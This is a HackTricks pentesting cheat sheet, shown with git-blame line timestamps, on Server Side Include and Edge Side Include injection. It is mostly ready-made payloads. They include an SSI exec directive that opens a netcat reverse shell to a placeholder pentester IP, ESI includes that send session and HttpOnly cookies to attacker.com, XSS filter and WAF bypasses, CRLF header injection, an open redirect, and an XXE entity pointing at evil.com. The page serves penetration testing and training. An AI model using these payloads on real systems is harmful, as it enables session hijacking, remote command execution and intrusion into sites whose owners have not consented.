hacktricks/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md

273 lines
12 KiB
Markdown
Raw Normal View History

2022-10-03 13:43:01 +00:00
# Server Side Inclusion/Edge Side Inclusion Injection
2022-04-28 16:01:33 +00:00
<details>
2023-12-31 01:25:17 +00:00
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2023-12-31 01:25:17 +00:00
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
2022-10-03 13:43:01 +00:00
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2023-12-31 01:25:17 +00:00
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
2024-02-09 07:14:36 +00:00
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2023-12-31 01:25:17 +00:00
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2022-10-03 13:43:01 +00:00
## Server Side Inclusion Basic Information
2021-06-07 09:30:58 +00:00
2024-02-06 03:10:38 +00:00
**(Introduction taken from [Apache docs](https://httpd.apache.org/docs/current/howto/ssi.html))**
2024-02-05 02:28:59 +00:00
2021-11-30 16:46:07 +00:00
SSI (Server Side Includes) are directives that are **placed in HTML pages, and evaluated on the server** while the pages are being served. They let you **add dynamically generated content** to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.\
2021-06-07 09:30:58 +00:00
For example, you might place a directive into an existing HTML page, such as:
`<!--#echo var="DATE_LOCAL" -->`
And, when the page is served, this fragment will be evaluated and replaced with its value:
`Tuesday, 15-Jan-2013 19:28:54 EST`
2024-02-05 02:28:59 +00:00
The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static, and how much needs to be recalculated every time the page is served. SSI is a great way to add small pieces of information, such as the current time - shown above. But if a majority of your page is being generated at the time that it is served, you need to look for some other solution.
2021-06-07 09:30:58 +00:00
2023-01-04 14:57:03 +00:00
You can infer the presence of SSI if the web application uses files with the extensions \*\* `.shtml`, `.shtm` or `.stm`\*\*, but it's not only the case.
2021-06-07 09:30:58 +00:00
A typical SSI expression has the following format:
```
2021-06-07 09:30:58 +00:00
<!--#directive param="value" -->
```
2022-10-03 13:43:01 +00:00
### Check
```javascript
// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->
// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->
// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->
// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->
2021-06-07 09:30:58 +00:00
```
2022-10-03 13:43:01 +00:00
## Edge Side Inclusion
2021-06-07 09:30:58 +00:00
There is a problem **caching information or dynamic applications** as part of the content may have **varied** for the next time the content is retrieved. This is what **ESI** is used form, to indicate using ESI tags the **dynamic content that needs to be generated** before sending the cache version.\
2021-06-07 09:30:58 +00:00
if an **attacker** is able to **inject an ESI tag** inside the cache content, then, he could be able to i**nject arbitrary content** on the document before it's sent to the users.
2022-10-03 13:43:01 +00:00
### ESI Detection
2021-06-07 09:30:58 +00:00
2022-10-03 13:43:01 +00:00
The following **header** in a response from the server means that the server is using ESI:
2021-06-07 09:30:58 +00:00
```
2021-06-07 09:30:58 +00:00
Surrogate-Control: content="ESI/1.0"
```
2023-01-04 14:57:03 +00:00
If you can't find this header, the server **might be using ESI anyways**.\
2022-10-03 13:43:01 +00:00
A **blind exploitation approach can also be used** as a request should arrive to the attackers server:
2021-06-07 09:30:58 +00:00
2022-10-03 13:43:01 +00:00
```javascript
// Basic detection
2023-01-04 14:57:03 +00:00
hell<!--esi-->o
// If previous is reflected as "hello", it's vulnerable
// Blind detection
<esi:include src=http://attacker.com>
2022-10-03 13:43:01 +00:00
// XSS Exploitation Example
2023-01-04 14:57:03 +00:00
<esi:include src=http://attacker.com/XSSPAYLOAD.html>
2022-10-03 13:43:01 +00:00
// Cookie Stealer (bypass httpOnly flag)
2023-01-04 14:57:03 +00:00
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>
2022-10-03 13:43:01 +00:00
// Introduce private local files (Not LFI per se)
<esi:include src="supersecret.txt">
// Valid for Akamai, sends debug information in the response
<esi:debug/>
2021-06-07 09:30:58 +00:00
```
2022-10-03 13:43:01 +00:00
### ESI exploitation
2024-02-06 03:10:38 +00:00
[GoSecure created](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) a table to understand possible attacks that we can try against different ESI-capable software, depending on the functionality supported:
2022-10-03 13:43:01 +00:00
* **Includes**: Supports the `<esi:includes>` directive
* **Vars**: Supports the `<esi:vars>` directive. Useful for bypassing XSS Filters
* **Cookie**: Document cookies are accessible to the ESI engine
* **Upstream Headers Required**: Surrogate applications will not process ESI statements unless the upstream application provides the headers
* **Host Allowlist**: In this case, ESI includes are only possible from allowed server hosts, making SSRF, for example, only possible against those hosts
2021-06-07 09:30:58 +00:00
2022-10-03 13:43:01 +00:00
| **Software** | **Includes** | **Vars** | **Cookies** | **Upstream Headers Required** | **Host Whitelist** |
| :--------------------------: | :----------: | :------: | :---------: | :---------------------------: | :----------------: |
| Squid3 | Yes | Yes | Yes | Yes | No |
| Varnish Cache | Yes | No | No | Yes | Yes |
| Fastly | Yes | No | No | No | Yes |
| Akamai ESI Test Server (ETS) | Yes | Yes | Yes | No | No |
| NodeJS esi | Yes | Yes | Yes | No | No |
| NodeJS nodesi | Yes | No | No | No | Optional |
#### XSS
2021-06-07 09:30:58 +00:00
The following ESI directive will load an arbitrary file inside the response of the server
2024-02-06 03:10:38 +00:00
```xml
2021-06-07 09:30:58 +00:00
<esi:include src=http://attacker.com/xss.html>
```
2022-10-03 13:43:01 +00:00
#### Bypass client XSS protection
2021-06-07 09:30:58 +00:00
2024-02-06 03:10:38 +00:00
```xml
2021-06-07 09:30:58 +00:00
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
2023-01-04 14:57:03 +00:00
Use <!--esi--> to bypass WAFs:
<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>
2021-06-07 09:30:58 +00:00
```
2022-10-03 13:43:01 +00:00
#### Steal Cookie
2021-06-07 09:30:58 +00:00
2023-01-04 14:57:03 +00:00
* Remote steal cookie
2024-02-06 03:10:38 +00:00
```xml
2021-06-07 09:30:58 +00:00
<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
```
2023-01-04 14:57:03 +00:00
* Steal cookie HTTP\_ONLY with XSS by reflecting it in the response:
```bash
# This will reflect the cookies in the response
<!--esi $(HTTP_COOKIE) -->
2024-02-06 03:10:38 +00:00
# Reflect XSS (you can put '"><svg/onload=prompt(1)>' URL encoded and the URL encode eveyrhitng to send it in the HTTP request)
2023-01-04 14:57:03 +00:00
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->
2024-02-06 03:10:38 +00:00
# It's possible to put more complex JS code to steal cookies or perform actions
```
2023-01-04 14:57:03 +00:00
2022-10-03 13:43:01 +00:00
#### Private Local File
2021-06-07 09:30:58 +00:00
Do not confuse this with a "Local File Inclusion":
```markup
<esi:include src="secret.txt">
```
2022-10-03 13:43:01 +00:00
#### CRLF
2021-06-07 09:30:58 +00:00
```markup
<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
```
2023-01-04 14:57:03 +00:00
#### Open Redirect
The following will add a `Location` header to the response
```bash
<!--esi $add_header('Location','http://attacker.com') -->
```
2022-10-15 14:18:24 +00:00
#### Add Header
2023-01-04 14:57:03 +00:00
* Add header in forced request
2024-02-06 03:10:38 +00:00
```xml
2022-10-15 14:18:24 +00:00
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345"/>
</esi:include>
```
2023-01-04 14:57:03 +00:00
* Add header in response (useful to bypass "Content-Type: text/json" in a response with XSS)
2022-10-15 14:18:24 +00:00
2023-01-04 14:57:03 +00:00
```bash
<!--esi/$add_header('Content-Type','text/html')/-->
<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
2024-02-06 03:10:38 +00:00
# Check the number of url_decode to know how many times you can URL encode the value
2023-01-04 14:57:03 +00:00
```
#### CRLF in Add header (**CVE-2019-2438)**
2022-10-15 14:18:24 +00:00
2024-02-06 03:10:38 +00:00
```xml
2022-10-15 14:18:24 +00:00
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>
```
2022-10-03 13:43:01 +00:00
#### Akamai debug
2021-06-07 09:30:58 +00:00
This will send debug information included in the response:
2024-02-06 03:10:38 +00:00
```xml
2021-06-07 09:30:58 +00:00
<esi:debug/>
```
2022-10-03 13:43:01 +00:00
### ESI + XSLT = XXE
2021-06-07 09:30:58 +00:00
2024-02-06 03:10:38 +00:00
By specifying the `xslt` value for the _dca_ parameter, it is feasible to include **`eXtensible Stylesheet Language Transformations (XSLT)`** based ESI. The inclusion causes the HTTP surrogate to retrieve the XML and XSLT files, with the latter filtering the former. Such XML files are exploitable for _XML External Entity (XXE)_ attacks, enabling attackers to execute SSRF attacks. However, the utility of this approach is limited since ESI includes already serve as an SSRF vector. Due to the absence of support in the underlying Xalan library, external DTDs are not processed, preventing local file extraction.
2021-06-07 09:30:58 +00:00
2024-02-06 03:10:38 +00:00
```xml
2021-06-07 09:30:58 +00:00
<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />
```
2024-02-06 03:10:38 +00:00
XSLT file:
2021-06-07 09:30:58 +00:00
2024-02-06 03:10:38 +00:00
```xml
2021-06-07 09:30:58 +00:00
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>
```
2021-06-07 11:31:39 +00:00
Check the XSLT page:
{% content-ref url="xslt-server-side-injection-extensible-stylesheet-language-transformations.md" %}
[xslt-server-side-injection-extensible-stylesheet-language-transformations.md](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
{% endcontent-ref %}
2021-06-07 11:31:39 +00:00
2022-10-03 13:43:01 +00:00
### References
2021-06-07 09:30:58 +00:00
* [https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
* [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
2022-10-03 13:43:01 +00:00
* [https://academy.hackthebox.com/module/145/section/1304](https://academy.hackthebox.com/module/145/section/1304)
2023-01-04 14:57:03 +00:00
* [https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91](https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91)
2021-06-07 09:30:58 +00:00
2022-10-03 13:43:01 +00:00
## Brute-Force Detection List
2021-06-27 21:56:13 +00:00
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %}
2022-04-28 16:01:33 +00:00
<details>
2023-12-31 01:25:17 +00:00
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2023-12-31 01:25:17 +00:00
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
2022-10-03 13:43:01 +00:00
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2023-12-31 01:25:17 +00:00
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
2024-02-09 07:14:36 +00:00
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2023-12-31 01:25:17 +00:00
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>